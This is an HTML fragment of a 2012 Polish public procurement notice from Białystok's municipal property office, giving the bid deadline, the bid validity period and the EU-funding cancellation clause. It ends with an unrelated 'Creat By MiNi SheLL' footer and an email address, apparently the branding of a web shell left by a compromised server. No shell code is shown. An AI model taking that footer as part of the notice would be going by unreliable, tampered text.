<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.04.2012 godzina 13:00, miejsce: Zarząd Mienia Komunalnego  15-370 Białystok  ul.gen. J. Bema  89/1 -pok. 201- Sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com